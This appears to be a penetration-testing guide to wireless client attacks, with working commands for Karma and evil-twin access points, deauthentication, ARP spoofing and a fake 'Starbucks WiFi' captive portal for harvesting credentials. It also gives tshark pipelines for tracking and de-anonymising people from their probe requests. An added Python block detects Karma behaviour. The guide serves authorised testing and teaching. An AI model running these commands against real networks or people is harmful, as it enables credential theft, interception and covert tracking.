
Wireless Client Attacks

#Overview

Wireless client attacks target the client device (laptop, phone, IoT device) rather than the access point. Clients are often more vulnerable than APs because they actively seek known networks, trust probe responses, and may auto-connect to previously remembered SSIDs. These attacks don't require compromising the target AP — instead, they exploit client behavior to force connections to an attacker-controlled AP.

#Attack Categories

#1. Karma Attacks

The Karma attack exploits the 802.11 probe request/response mechanism. When a client searches for known networks, it sends probe requests, either broadcast (any SSID) or directed (naming a saved SSID). A Karma-enabled AP answers every directed probe request with a matching probe response, so the client believes it has found one of its saved networks and associates.

```bash
# Passive probe request monitoring (no transmission)
sudo airodump-ng wlan0mon --write probe-requests

# Review captured probe requests for target SSIDs
tshark -r probe-requests-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid | sort -u

# Active Karma attack with eaphammer
sudo eaphammer --interface wlan0 \
  --essid "" \
  --channel <CH> \
  --karma \
  --captive-portal

# Karma attack with hostapd-wpe (requires karma patch)
# Responds to all directed probe requests
sudo hostapd-wpe /tmp/hostapd-karma.conf
```

#2. Directed Probe Request Attacks

Most clients send directed probe requests for their saved networks. Capture these to identify target SSIDs, then create an evil twin matching those SSIDs.

```bash
# Step 1: Capture probe requests
sudo airodump-ng wlan0mon --write probes

# Step 2: Extract unique SSIDs from probe requests
tshark -r probes-01.cap -Y 'wlan.fc.type_subtype == 0x0004 && wlan.ssid != ""' \
  -T fields -e wlan.sa -e wlan.ssid | sort -u

# Step 3: Create evil twin for the most common SSID
sudo eaphammer --interface wlan0 \
  --essid "<TARGET_SSID>" \
  --channel <CH> \
  --captive-portal

# Step 4: Deauth clients from legitimate AP to force reconnection
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
```

#3. Client Isolation Bypass

Many enterprise APs implement client isolation, which blocks direct client-to-client traffic on the wireless segment. It can sometimes be bypassed:

```bash
# Check if client isolation is active
sudo airodump-ng wlan0mon --channel <CH>
# If you can see other clients but not ping them, isolation is active

# Bypass via wired side
# If you have access to the wired network, client isolation doesn't apply

# Bypass via ARP spoofing (may work on some APs)
arpspoof -i wlan0 -t <gateway_ip> <target_client_ip>

# Bypass via multicast/broadcast
# Some APs allow multicast/broadcast between isolated clients
nmap -sU -p 5353 <target_subnet>  # mDNS
```

#4. Wi-Fi Direct Attacks

Wi-Fi Direct (P2P) allows devices to connect without an AP. It's commonly used for printing, screen casting, and file sharing.

```bash
# Discover Wi-Fi Direct devices
# p2p_find and p2p_peers are wpa_cli commands, run inside the interactive wpa_cli shell
sudo wpa_cli -i wlan0
> p2p_find
> p2p_peers

# Connect as a P2P client
> p2p_connect <peer_mac> pbc persistent

# Attack Wi-Fi Direct:
# 1. Rogue P2P GO (Group Owner) - force devices to connect to attacker
# 2. WPS PIN attack on P2P (same vulnerabilities as infrastructure WPS)
# 3. P2P invitation flooding - DoS
```

#5. Hotspot Credential Theft

Clients that auto-connect to open hotspots (hotel, airport, coffee shop) can be targeted by creating a matching SSID.

```bash
# Common hotspot SSIDs to mimic
# "Starbucks WiFi", "Hotel_Guest", "Airport_Free_WiFi", "attwifi", "xfinitywifi"

# Set up evil twin with common hotspot SSID
sudo eaphammer --interface wlan0 \
  --essid "Starbucks WiFi" \
  --channel 6 \
  --captive-portal

# The captive portal mimics the real hotspot's login page
# Clients auto-connect and submit credentials
```

#6. Probe Request Tracking for Location Correlation

Probe requests reveal a client's previously connected networks, enabling location tracking and SSID profiling.

```bash
# Continuous probe request capture
sudo airodump-ng wlan0mon --write probe-tracking --output-format pcap,csv

# Extract client MAC addresses and their preferred SSIDs
# tshark -T fields output is tab-separated; tell awk so that empty SSIDs
# (broadcast probes) and SSIDs containing spaces don't shift the columns
tshark -r probe-tracking-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid -e wlan.fc.type_subtype | \
  awk -F'\t' '$3 == "4" {print $1, $2}' | sort -u

# Geographic correlation
# Probe requests include signal strength, enabling physical location estimation
tshark -r probe-tracking-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid -e radiotap.dbm_antsignal | \
  sort -u

# De-anonymization: correlate MAC addresses with SSIDs to identify specific users
# E.g., "John's iPhone" connects to "HomeNetwork" and "OfficeWiFi"
```
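The tshark extractions in sections 2 and 6 and the WIDS detection point from the Karma section both come down to the same parsing step. The following added example (not part of this module) processes constructed tshark `-T fields` style output (tab-separated subtype, source MAC, SSID) to show what a client's probe requests reveal and how a monitor flags a responder that answers probes for many distinct SSIDs, which is the Karma indicator a WIDS looks for. The sample lines, MAC addresses and threshold are assumptions.

```python
"""Parse tshark-style probe request/response fields (tab-separated subtype, MAC, SSID),
derive each client's leaked preferred-network list and flag Karma-like responders."""
from collections import defaultdict

PROBE_REQ, PROBE_RESP = "4", "5"  # wlan.fc.type_subtype as tshark prints it

# Constructed sample (not a real capture). Client ...01 probes two saved networks
# plus one broadcast probe; AP cc:..:01 answers only its own SSID; dd:..:01 answers
# every SSID it hears, which is how a Karma AP behaves.
SAMPLE = """\
4\taa:aa:aa:aa:aa:01\tHomeNetwork
4\taa:aa:aa:aa:aa:01\tOfficeWiFi
4\taa:aa:aa:aa:aa:01\t
4\taa:aa:aa:aa:aa:02\tHotel_Guest
5\tcc:cc:cc:cc:cc:01\tCorpWiFi
5\tdd:dd:dd:dd:dd:01\tHomeNetwork
5\tdd:dd:dd:dd:dd:01\tOfficeWiFi
5\tdd:dd:dd:dd:dd:01\tHotel_Guest
"""

def parse_fields(text):
    """Yield (subtype, mac, ssid); an empty SSID (broadcast probe) is kept as ''."""
    for line in text.splitlines():
        if line.strip():
            parts = line.split("\t")
            parts += [""] * (3 - len(parts))   # tolerate a missing trailing field
            yield parts[0], parts[1].lower(), parts[2]

def client_profiles(records):
    """Client MAC -> set of named SSIDs it probed for (its leaked preferred networks)."""
    profiles = defaultdict(set)
    for subtype, mac, ssid in records:
        if subtype == PROBE_REQ and ssid:
            profiles[mac].add(ssid)
    return dict(profiles)

def karma_suspects(records, threshold=3):
    """Responder MAC -> sorted SSIDs, for responders answering >= threshold distinct SSIDs.
    A real AP answers for the few SSIDs it serves; a Karma AP answers for all of them."""
    answered = defaultdict(set)
    for subtype, mac, ssid in records:
        if subtype == PROBE_RESP and ssid:
            answered[mac].add(ssid)
    return {mac: sorted(s) for mac, s in answered.items() if len(s) >= threshold}

if __name__ == "__main__":
    recs = list(parse_fields(SAMPLE))
    print("client profiles:", client_profiles(recs))
    print("karma suspects:", karma_suspects(recs))
```

Feed it real data with `tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x0004 || wlan.fc.type_subtype == 0x0005' -T fields -e wlan.fc.type_subtype -e wlan.sa -e wlan.ssid`; the threshold needs tuning for APs that legitimately serve several SSIDs.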

#Passive vs Active Client Attacks

| Attack Type | Passive | Active |
|---|---|---|
| Probe request monitoring | Yes | No |
| SSID profiling | Yes | No |
| Location tracking | Yes | No |
| Karma attack | No | Yes |
| Directed probe response | No | Yes |
| Evil twin | No | Yes |
| Deauth + force reconnection | No | Yes |

Rule of thumb: Start with passive monitoring (probe requests, SSID profiling). Move to active attacks only when passive methods are insufficient.

#OPSEC Considerations

  • Passive probe request monitoring is undetectable to clients — the attacker never transmits
  • Karma attacks are detectable by WIDS because the AP responds to probe requests for SSIDs it shouldn't know
  • Evil twin SSIDs are visible to anyone scanning in the area
  • Probe request tracking raises privacy concerns — ensure scope explicitly covers location tracking
  • Deauthentication to force reconnection is highly visible and logged by enterprise APs
  • Always verify scope includes client device testing before targeting end-user devices

#Cross-References

#Tool References

| Tool | Purpose | Link |
|---|---|---|
| airodump-ng | Probe request capture | https://www.aircrack-ng.org/ |
| eaphammer | Karma attack + evil twin | https://github.com/s0lst1c3/eaphammer |
| hostapd-wpe | Karma-enabled rogue AP | https://github.com/OpenSecurityResearch/hostapd-wpe |
| bettercap | WiFi recon and client tracking | https://www.bettercap.org/ |
| tshark | Packet analysis | https://www.wireshark.org/ |
| wpa_cli | Wi-Fi Direct (P2P) | https://w1.fi/ |